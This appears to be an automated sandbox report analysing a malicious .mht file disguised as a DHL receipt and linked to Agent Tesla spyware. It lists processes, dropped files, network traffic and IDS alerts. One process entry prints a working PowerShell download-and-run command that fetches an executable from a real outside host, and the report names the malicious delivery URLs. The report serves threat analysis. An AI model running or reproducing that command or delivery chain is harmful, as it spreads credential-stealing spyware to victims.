File name: | dhl_receipt_receipt_sofia.mht |
Full analysis: | https://app.any.run/tasks/b4613e10-6c79-447f-8098-ee649282ef6f |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
Analysis date: | July 17, 2019, 11:32:25 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF line terminators |
MD5: | ABB4D022686FA1836E4B992F09AB2E72 |
SHA1: | A2D700F2A247F86D417C74CE7A5241FB92891890 |
SHA256: | 7BAD8B7FEB1C0022F724BB75B403740F2E60EA3343ADCF7F693DD4D65AA48BF9 |
SSDEEP: | 6:4Q0kJQQ8a0NNEXW0Yfcvj3VTfCQ93rWNmdofTQNZ8vn:4Q0AQQYf2j3VTr93rsnfTQNav |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3364 | "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\dhl_receipt_receipt_sofia.mht | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3596 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3364 CREDAT:79873 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3788 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3364 CREDAT:137473 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3356 | C:\Windows\System32\mshta.exe -Embedding | C:\Windows\System32\mshta.exe | svchost.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2176 | "C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe','%temp%\vnnv.exe'); Start '%temp%\vnnv.exe' | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3044 | powershell (new-object System.Net.WebClienT).DownloadFile('http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe','C:\Users\admin\AppData\Local\Temp\vnnv.exe'); Start 'C:\Users\admin\AppData\Local\Temp\vnnv.exe' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3268 | "C:\Users\admin\AppData\Local\Temp\vnnv.exe" | C:\Users\admin\AppData\Local\Temp\vnnv.exe | powershell.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3220 | C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503} | C:\Windows\system32\DllHost.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: COM Surrogate Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1672 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\61346614\add.vbs" | C:\Windows\System32\WScript.exe | — | vnnv.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2916 | "C:\Users\admin\AppData\Local\Temp\61346614\brk.exe" snb=uiw | C:\Users\admin\AppData\Local\Temp\61346614\brk.exe | — | WScript.exe |
User: admin Company: AutoIt Team Integrity Level: MEDIUM Description: AutoIt v3 Script Exit code: 0 Version: 3, 3, 14, 4 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3364 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
3364 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3788 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | |
MD5:0BECF2F991661E5C679568C79216E0BE | SHA256:01154F3F8A90378911859430F58B078503E58532B44AA57BB4F7122CB3735AFA | |||
3596 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019071720190718\index.dat | dat | |
MD5:FA65EB20A031F0927689F0C3A5E202D3 | SHA256:1A99DFFD91E1E8D0A4953EC51C2DE75D207B70DAB7E5DEDCFEA62110E5998A57 | |||
3596 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wbkE7F2.tmp | text | |
MD5:5802850DF1DF6128C5AF93230BC19CD4 | SHA256:08F77CDB468CE1C739BC87517F5185258672836C32526EFC76031287972EEFC8 | |||
3788 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | |
MD5:6CA9752A59010A03AB29B106C00DE194 | SHA256:0FC70631B554426848FC64AC3DCC4611775CA7B9F8BBC7921DF346B6D66C7FAD | |||
3788 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012019071720190718\index.dat | dat | |
MD5:9A8553ED6380746E6B4D42F3682F5F66 | SHA256:F801C74F3E6752756978B2FBB0F99879830A4F519A07A78F1929DD620A85613C | |||
3596 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\wbkE698.tmp | text | |
MD5:5802850DF1DF6128C5AF93230BC19CD4 | SHA256:08F77CDB468CE1C739BC87517F5185258672836C32526EFC76031287972EEFC8 | |||
3356 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\dhl_receipt_receipt_sofia[1].hta | html | |
MD5:FD9AF6BBDDBC3F7A7457FC9373DF5FCD | SHA256:030942FFE434909F48AD80320E1B5C9FADE50B7AA61F35C7B195620236E33A5F | |||
3788 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\SJ2B48XV\dhl_receipt_receipt_sofia[1].hta | html | |
MD5:FD9AF6BBDDBC3F7A7457FC9373DF5FCD | SHA256:030942FFE434909F48AD80320E1B5C9FADE50B7AA61F35C7B195620236E33A5F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3788 | iexplore.exe | GET | 200 | 94.156.77.35:80 | http://elkom.express/pic/pic/dhl_receipt_receipt_sofia.hta | BG | html | 5.84 Kb | suspicious |
3356 | mshta.exe | GET | 200 | 94.156.77.35:80 | http://elkom.express/pic/pic/dhl_receipt_receipt_sofia.hta | BG | html | 5.84 Kb | suspicious |
3044 | powershell.exe | GET | 200 | 103.1.208.220:80 | http://jpf.edu.vn/vendor/league/em2/5yh11p1111111113a.exe | VN | executable | 1.50 Mb | suspicious |
3364 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3364 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3356 | mshta.exe | 94.156.77.35:80 | elkom.express | Neterra Ltd. | BG | suspicious |
3788 | iexplore.exe | 94.156.77.35:80 | elkom.express | Neterra Ltd. | BG | suspicious |
3044 | powershell.exe | 103.1.208.220:80 | jpf.edu.vn | CHT Compamy Ltd | VN | suspicious |
Domain | IP | Reputation |
---|---|---|
www.bing.com |
| whitelisted |
elkom.express |
| suspicious |
jpf.edu.vn |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3788 | iexplore.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of String.fromCharCode % Encoding |
3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of charCodeAt % Encoding |
3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of document.write % Encoding |
3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of parseInt % Encoding |
3788 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of unescape % Encoding |
3356 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
3356 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
3356 | mshta.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of String.fromCharCode % Encoding |
3356 | mshta.exe | Potentially Bad Traffic | ET WEB_CLIENT Hex Obfuscation of charCodeAt % Encoding |